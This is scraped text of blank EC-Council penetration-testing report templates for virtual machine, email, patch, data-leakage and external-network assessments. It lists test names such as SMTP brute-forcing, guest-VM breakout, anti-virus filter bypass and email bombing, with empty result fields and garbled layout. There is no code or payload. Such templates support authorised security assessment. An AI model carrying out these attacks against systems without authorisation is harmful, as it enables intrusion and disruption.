VPN Under DoS 2.
Attack
3.
Effect on the VPN 1.

due to Shared Part of 2.
the Network under
DoS Attack 3.
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Virtual Machine Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template VMPT/26

Test 1: Scan for virtual environments
Target Organization
URL
Host Machine
Detected Virtual
Environments
Services Created on 1.
Specific Ports by 2.
Virtual Platforms
3.
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template VMPT/26 Copyright by EC-Council

Test 2: Search for virtual environments
Target Organization
URL
Discovered Virtual
Environments
List of Computers, 1.
Routers, and Servers 2.
discovered Using
Variety of Filters 3.
4.
5.
Tools/Services Used
1.
2.
3.
4.
5.
Results Analysis:

Test 3: Check if a documented policy exists for creating new virtual machines
Target Organization
URL
Host Machine
Documented Policy Available to
YES NO
Create New Virtual Machines
2.
3.
4.
5.
Results Analysis:

Test 4: Create inventory of virtual machines
Target Organization
URL
Host Machine
Inventory (List of All Virtual Machines)
Online VMs Offline VMs Rouge VMs
2.
3.
4.
5.
Results Analysis:

Test 5: Check patch status of host and guest operating systems
Target Organization
URL
Patch Status of Host
Operating Systems
Patch Status of Guest
Operating Systems
List all Unpatched 1.
Host and Guest 2.
Operating Systems
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 6: Check VM configuration for unused emulated hardware
Target Organization
URL
Analyzed VM
Configuration
Settings
List of All Unused 1.
Emulated Hardware 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 7: Check IP addressing information on virtual NICs
Target Organization
URL
Host Operating
System
Information 1.
Gathered from the 2.
Host Operating
Systems Virtual NIC 3.
on the Untrusted 4.
Network
5.
2.
3.
4.
5.
Results Analysis:

Test 8: Check the network bandwidth limit per VM
Target Organization
URL
Outbound Traffic From a Virtual Machine Inbound Traffic To a Virtual Machine
Average Size: Average Size:
Peak Size: Peak Size:
Burst Size: Burst Size:
2.
3.
4.
5.
Results Analysis:

Test 9: Check virtual switches for promiscuous mode
Target Organization
URL
Promiscuous Mode Enabled on Virtual
Yes No
Switches and on Virtual Distributed Switches
Enabled ESX Hypervisor True False
2.
3.
4.
5.
Results Analysis:

Test 10: Perform virtual machines stress testing
Target Organization
URL
Memory Reliability
Input/output
Performance of VMs
Network
Performance of the
Virtual Machines
2.
3.
4.
5.
Results Analysis:

Test 11: Try to exploit hypervisors using automated exploit tools
Target Organization
URL
Exploited
Hypervisors
Results of the Exploit
2.
3.
4.
5.
Results Analysis:

Test 12: Try to break out of guest VM
Target Organization
URL
Host Operating
System
Guest Virtual
Machine
Exploited VMware
Workstation
2.
3.
4.
5.
Results Analysis:

Test 13: Perform vulnerability assessment of virtual environment
Target Organization
URL
Findings from 1.
Vulnerability 2.
Assessment of
Virtual Environment 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Email Security Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template ESPT/32

Test 1: Perform SMTP service fingerprinting
Target Organization
URL
Email System 1.
Security Auditing 2.
Begins
3.
4.
5.
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template ESPT/32 Copyright by EC-Council

Test 2: Perform directory harvest attacks
Target Organization
URL
Directory harvest 1.
attack (DHA) is 2.
Commonly Used to
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 3: Enumerate enabled SMTP subsystems and features
Target Organization
URL
Enabling SMTP 1.
Subsystems and 2.
Features
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 4: Perform SMTP password brute-forcing
Target Organization
URL
Find out for Possible 1.
Vulnerabilities in the 2.
SMTP Server
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 5: Perform NTLM overflows attack through SMTP authentication
Target Organization
URL
What is NTLM (NT 1.
LAN Manager) 2.
Authentication
Mechanism 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 6: Test for SMTP open relay
Target Organization
URL
Check with the SMTP 1.
Server Configuration 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 7: Perform SMTP user enumeration
Target Organization
URL
RCPT TO: and VRFY 1.
Commands can be 2.
used for
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 8: Perform POP3 password brute-forcing
Target Organization
URL
Find out POP3 1.
Services used for 2.
Weak Passwords
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 9: Perform IMAP brute-forcing
Target Organization
URL
Perform 1.
Authentication 2.
Process with the
Brute-Forcing 3.
Method 4.
5.
2.
3.
4.
5.
Results Analysis:

Test 10: Test for IMAP process manipulation attack
Target Organization
URL
How to Escalate 1.
Authentication and 2.
Post Authentication
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 11: Check for known vulnerabilities in mail servers and hosts
Target Organization
URL
Find out the 1.
Vulnerable Hosts and 2.
Mail Servers
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 12: Check the patch status of mail server and host systems
Target Organization
URL
Find out all Hosts in 1.
the Target Network 2.
are Fully Patched
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 13: Try to crack email passwords
Target Organization
URL
Note down the 1.
Cracked Email 2.
Address and
Passwords 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 14: Check whether anti-phishing software is enabled
Target Organization
URL
Anti-Phishing Yes No
Software is Enabled
2.
3.
4.
5.
Results Analysis:

Test 15: Check whether anti-spamming tools are enabled
Target Organization
URL
Anti-Spamming Tools Yes No
are Enabled
2.
3.
4.
5.
Results Analysis:

Test 16: Try to perform email bombing
Target Organization
URL
Perform Email 1.
Bombing and List 2.
Down the Unwanted
emails you have 3.
Discovered 4.
5.
2.
3.
4.
5.
Results Analysis:

Test 17: Perform CLSID extension vulnerability test
Target Organization
URL
Check CLSID Yes No
Extensions are
Enabled
2.
3.
4.
5.
Results Analysis:

Test 18: Perform VBS attachment vulnerability test
Target Organization
URL
Find the Virtual basic 1.
script (VBS) 2.
Attachment
Vilnerability Test 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 19: Perform double file extension vulnerability test
Target Organization
URL
What is .vbs file 1.
Extensions 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 20: Perform long file name vulnerability test
Target Organization
URL
Check Long File 1.
Name Vulnerabilities 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 21: Perform malformed file extension vulnerability test
Target Organization
URL
Try to read the .HTA 1.
in your mail 2.
Attachment
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 22: Perform access exploit vulnerability test
Target Organization
URL
VBA (Visual Basic for 1.
Applications) Code 2.
and Find out the
Vulnerabilities 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 23: Perform fragmented message vulnerability test
Target Organization
URL
How to Bypass the 1.
Anti-Virus Filters 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 24: Perform long subject attachment checking test
Target Organization
URL
Find the 1.
Vulnerabilities of 2.
Long Subject
Attachments 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 25: Perform no file attachment vulnerability test
Target Organization
URL
Accessing the
Mailbox by Sending
for Vulnerability Test
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Security Patches Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template SPPT/33

Test 1: Check if organization has a PVG in place
Target Organization
URL
PVG Team Addresses 1.
and Helps in 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template SPPT/33 Copyright by EC-Council

Test 2: Check whether the security environment is updated
Target Organization
URL
Check with the 1.
Security 2.
Environment
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 3: Check whether the organization uses automated patch management tools
Target Organization
URL
Check if Automated Yes No
Patch Management
Tools Regularly
Updated
2.
3.
4.
5.
Results Analysis:

Test 4: Check the last dates/timing process of patch management
Target Organization
URL
Explain the Process 1.
of Patch 2.
Management
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 5: Check the patches on non-production systems
Target Organization
URL
Installaing Patches 1.
on Non-Production 2.
Systems
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 6: Check the vendor authentication mechanism
Target Organization
URL
Find the 1.
Authentication 2.
Method of
Downloaded Patches 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 7: Check the probability of patches containing malicious code
Target Organization
URL
Run an Anti-Virus 1.
Tool on Downloaded 2.
virus patch
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 8: Check for dependency of new patches
Target Organization
URL
Check Newly 1.
Installed patches are 2.
Compromising and
Conflicting 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 9: Check the compliance of change management
Target Organization
URL
How to check
Standard
Configurations are
Deployed
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Data Leakage Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template DLPT/34

Test 1: Check the physical availability of USB devices
Target Organization
URL
Physical Availability 1.
of USB Devices in 2.
Device Manager
3.
4.
5.
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template DLPT/34 Copyright by EC-Council

Test 2: Check whether the USB drive is enabled
Target Organization
URL
USB Drive is Enabled Yes No
or Disabled
2.
3.
4.
5.
Results Analysis:

Test 3: Try to Enable USB
Target Organization
URL
Enabling USB Devices 1.
2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 4: Check whether the USB asks for password
Target Organization
URL
Check Whether the Yes No
Device asks for
Authentication
2.
3.
4.
5.
Results Analysis:

Test 5: Check whether Bluetooth is enabled
Target Organization
URL
Check Bluetooth is Yes No
Enabled
2.
3.
4.
5.
Results Analysis:

Test 6: Check if FireWire is enabled
Target Organization
URL
Check Whether the Yes No
FireWire Port is
Enabled
2.
3.
4.
5.
Results Analysis:

Test 7: Check if the FTP ports 21 and 22 are enabled
Target Organization
URL
Check if FTP Ports Yes No
are Enabled
2.
3.
4.
5.
Results Analysis:

Test 8: Check whether any memory slot is available and enabled in systems
Target Organization
URL
Check Whether Any Yes No
Memory Slot is
Enabled or not
2.
3.
4.
5.
Results Analysis:

Test 9: Check whether employees are using camera devices within the restricted areas
Target Organization
URL
Illegal use of Camera 1.
Devices Leads to 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 10: Check whether systems have any camera driver installed
Target Organization
URL
Find in Systems that Yes No
any Camera Driver
Installed
2.
3.
4.
5.
Results Analysis:

Test 11: Check whether anti-spyware and anti-trojans are enabled
Target Organization
URL
Anti-Spyware and Yes No
Anti-Trojans Are
Enabled
2.
3.
4.
5.
Results Analysis:

Test 12: Check whether the encrypted data can be decrypted
Target Organization
URL
Data Encryption 1.
Techniques Protect 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 13: Check if the internal hardware components are locked
Target Organization
URL
Internal Hardware Yes No
Components are
Locked
2.
3.
4.
5.
Results Analysis:

Test 14: Check whether size of mail and mail attachments is restricted
Target Organization
URL
Restrict the Size 1.
Limits for mail and 2.
mail attachments
3.
4.
5.
2.
3.
4.
5.
Results Analysis:


Pen Testing Formats For Enterprises

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Pen Testing Formats For Enterprises

Uploaded by

Copyright:

Available Formats

EC-Council Licensed Penetration

Methodology: External Network Penetration Testing

Confidential 1 Template ENPT/06

Test 1: Perform information gathering

World Map of the

Confidential 2 Template ENPT/06 Copyright by EC-Council

Confidential 3 Template ENPT/06 Copyright by EC-Council

Confidential 4 Template ENPT/06 Copyright by EC-Council

Test 2: Create topological map of the network

Confidential 5 Template ENPT/06 Copyright by EC-Council

Customers and Partners Networked to other Systems

Confidential 6 Template ENPT/06 Copyright by EC-Council

Test 3: Locate TCP/UDP traffic path to the destination

Confidential 7 Template ENPT/06 Copyright by EC-Council

Test 4: Identify the physical location of the target servers

Confidential 8 Template ENPT/06 Copyright by EC-Council

Test 5: Locate the ISP servicing the client

Which other companies 1.

Confidential 9 Template ENPT/06 Copyright by EC-Council

Test 6: Examine the use of IPv6 at the remote location

Confidential 10 Template ENPT/06 Copyright by EC-Council

Test 7: Examine the system uptime of target server

Confidential 11 Template ENPT/06 Copyright by EC-Council

Test 8: Examine the patches applied to the target operating system

Confidential 12 Template ENPT/06 Copyright by EC-Council

Test 9: Checking for live systems - ICMP scanning

Confidential 13 Template ENPT/06 Copyright by EC-Council

Confidential 14 Template ENPT/06 Copyright by EC-Council

Test 11: List open and closed ports

List the Ports that are 1.

Confidential 15 Template ENPT/06 Copyright by EC-Council

Confidential 16 Template ENPT/06 Copyright by EC-Council

Confidential 17 Template ENPT/06 Copyright by EC-Council

Confidential 18 Template ENPT/06 Copyright by EC-Council

Confidential 19 Template ENPT/06 Copyright by EC-Council

Confidential 20 Template ENPT/06 Copyright by EC-Council

Confidential 21 Template ENPT/06 Copyright by EC-Council

Confidential 22 Template ENPT/06 Copyright by EC-Council

Confidential 23 Template ENPT/06 Copyright by EC-Council

Test 19: Use fragmentation scanning and examine the response

Confidential 24 Template ENPT/06 Copyright by EC-Council

Test 20: OS fingerprint target servers

Confidential 25 Template ENPT/06 Copyright by EC-Council

Test 21: Grab the banner of HTTP servers

Confidential 26 Template ENPT/06 Copyright by EC-Council

Test 22: Grab the banner of SMTP servers

Confidential 27 Template ENPT/06 Copyright by EC-Council

Test 23: Grab the banner of POP3 servers

Confidential 28 Template ENPT/06 Copyright by EC-Council

Test 24: Grab the banner of FTP servers

Confidential 29 Template ENPT/06 Copyright by EC-Council

Confidential 30 Template ENPT/06 Copyright by EC-Council

Test 26: Examine TCP sequence number prediction

Confidential 31 Template ENPT/06 Copyright by EC-Council

Test 27: Examine IPID sequence number prediction

Confidential 32 Template ENPT/06 Copyright by EC-Council

Test 28: Examine the use of standard and non-standard protocols

Confidential 33 Template ENPT/06 Copyright by EC-Council

Confidential 34 Template ENPT/06 Copyright by EC-Council

Confidential 35 Template ENPT/06 Copyright by EC-Council

Confidential 36 Template ENPT/06 Copyright by EC-Council

Confidential 37 Template ENPT/06 Copyright by EC-Council

Test 31: Look for error and custom web pages